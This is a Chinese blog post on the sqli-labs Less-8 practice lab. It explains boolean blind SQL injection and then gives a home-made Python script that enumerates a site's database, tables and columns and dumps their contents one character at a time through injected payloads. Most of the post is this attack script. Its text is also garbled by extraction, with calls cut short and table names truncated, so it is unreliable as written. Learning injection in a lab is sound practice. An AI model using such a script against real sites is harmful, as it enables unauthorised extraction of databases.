2023年7月24日发(作者：)

sqli-labs-Less8关于布尔盲注这是⼀道布尔注⼊的题⽬，其实也可以时间盲注，但是这⾥介绍⼀下bool注⼊。关于布尔注⼊，主要使⽤的就是:Length（）函数 返回字符串的长度Substr（）截取字符串Ascii（）返回字符的ascii码sleep(n)：将程序挂起⼀段时间 n为n秒if(expr1,expr2,expr3):判断语句 如果第⼀个语句正确就执⾏第⼆个语句如果错误执⾏第三个语句具体的过程这⾥就不介绍了，因为⾮常容易上⼿，就是有点费⼿，所以最好不要⼿注。因此可以使⽤burp suite来进⾏注⼊或者sqlmap来直接爆（sqlmap,永远滴神）。但是最好还是学会⾃⼰写轮⼦，每学⼀种就写轮⼦，这样慢慢积累，等同于⾃⼰写了个sqlmap。这⾥我写了个布尔注⼊的脚本，⾮常简陋⽽且并没有⽤⼆分法（别问，问就是⼆分法没学好。。。）。以后会改成⼆分法来提⾼效率。import requestsdef database_len(url,param1,param2,cont): #url='''/Less-8/''' for i in range(1,10): payload=''' and length(database())=%d -- -'''%i r=(url+param1+payload) if cont in : print('database_length:',i) return idef database_name(url,param1,param2,cont,db_len): database_name='' #url='''/Less-8/''' for i in range(1,db_len+1): for j in 'abcdefghijklmnopqrstuvwxyz': payload=''' and substr(database(),%d,1)='%s' -- -'''%(i,j) r=(url+param1+payload) if cont in : database_name+=j break print('database_name:',database_name) return database_namedef table_number(url,param1,param2,cont,db_name): #url='''/Less-8/''' i=0 while 1: payload=''' union select 1,2,table_name from information_ where table_schema='%s' limit %d,1 -- -'''%(db_name,i) r=(url+param2+payload) if cont in : i=i+1 else: break print('table_number:',i) return idef table_len(url,param1,param2,cont,i,db_name): #url='''/Less-8/''' for length in range(1,10): payload=''' and length((select table_name from information_ where table_schema='%s' limit %d,1))=%d -- -'''%(db_name,i,length) r=(url+param1+payload) if cont in : return lengthdef table_name(url,param1,param2,cont,table_number,db_name): #url='''/Less-8/''' table_names=[] for i in range(0,table_number): length=table_len(url,param1,param2,cont,i,db_name) table_name='' for j in range(0,length+1): for k in 'abcdefghijklmnopqrstuvwxyz': payload=''' and substr((select table_name from information_ where table_schema='%s' limit %d,1),%d,1)='%s' -- -'''%(db_name,i,j,k) r=(url+param1+payload) if cont in : table_name+=k break table_(table_name) return table_namesdef column_number(url,param1,param2,cont,table_name): #url='''/Less-8/''' i=0 while 1: payload=''' union select 1,2,column_name from information_s where table_name='%s' limit %d,1 -- -'''%(table_name,i) r=(url+param2+payload) if cont in : i=i+1 else: break print('%s表中列的数量:'%table_name,i) return idef column_len(url,param1,param2,cont,j,table_name): #url='''/Less-8/''' for length in range(1,25): payload=''' and length((select column_name from information_s where table_name='%s' limit %d,1))=%d -- -'''%(table_name,j,length) r=(url+param1+payload) if cont in : return lengthdef column_name(url,param1,param2,cont,table_names): #url='''/Less-8/''' #column_names=[] for table_name in table_names: column_num=column_number(url,param1,param2,cont,table_name) for j in range(0,column_num): column_name='' length=column_len(url,param1,param2,cont,j,table_name) #print('%s的第%d个列的长度为:%d'%(table_name,j+1,length)) for v in range(1,length+1): for k in 'abcdefghijklmnopqrstuvwxyz': payload=''' and substr((select column_name from information_s where table_name='%s' limit %d,1),%d,1)='%s' -- -'''%(table_name,j,v,k) r=(url+param1+payload) if cont in : column_name+=k break print('%s的第%d个列的名字是:%s'%(table_name,j+1,column_name)) print()def content_number(url,param1,param2,cont,table_n,column_n): #url='''/Less-8/''' i=0 while 1: payload=''' union select 1,2,%s from %s limit %d,1 -- -'''%(column_n,table_n,i) r=(url+param2+payload) if cont in : i=i+1 else: break return idef content_len(url,param1,param2,cont,table_n,column_n,i): #url='''/Less-8/''' for length in range(1,25): payload=''' and length((select %s from %s limit %d,1))=%d -- -'''%(column_n,table_n,i,length) r=(url+param1+payload) if cont in : return lengthdef content(url,param1,param2,cont,table_n,column_n): #url='''/Less-8/''' number=content_number(url,param1,param2,cont,table_n,column_n) for i in range(0,number): content='' length=content_len(url,param1,param2,cont,table_n,column_n,i) for j in range(1,length+1): for k in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ': payload=''' and substr((select %s from %s limit %d,1),%d,1)='%s' -- -'''%(column_n,table_n,i,j,k) r=(url+param1+payload) if cont in : content+=k break print(content)

url=input("请输⼊要注⼊的⽹址，例如/Less-8/ :")param1=input("请输⼊要注⼊的已经闭合了的参数且可回显的，例如 ?id=1' ：")param2=input("请输⼊要注⼊的已经闭合了的参数且不可回显的，例如 ?id=0' ：")cont=input("请输⼊布尔回显：")db_len=database_len(url,param1,param2,cont)print()db_name=database_name(url,param1,param2,cont,db_len)print()table_number=table_number(url,param1,param2,cont,db_name)print()table_names=table_name(url,param1,param2,cont,table_number,db_name)print('%s的表如下：'%db_name)for i in table_names: print(i)print()column_name(url,param1,param2,cont,table_names)print()#读取列的内容while 1: table_n=input('请输⼊您要读取的表名，如果输⼊I want to leave，那么程序就会退出：') if table_n=='I want to leave' : break column_n=input('请输⼊您要读取的列名，如果输⼊I want to leave，那么程序就会退出：') if column_n=='I want to leave': break print() content(url,param1,param2,cont,table_n,column_n) print() 因为刚学了相当于2天的python，所以也是写的惨不忍睹。。。（⼤师傅们轻点喷）。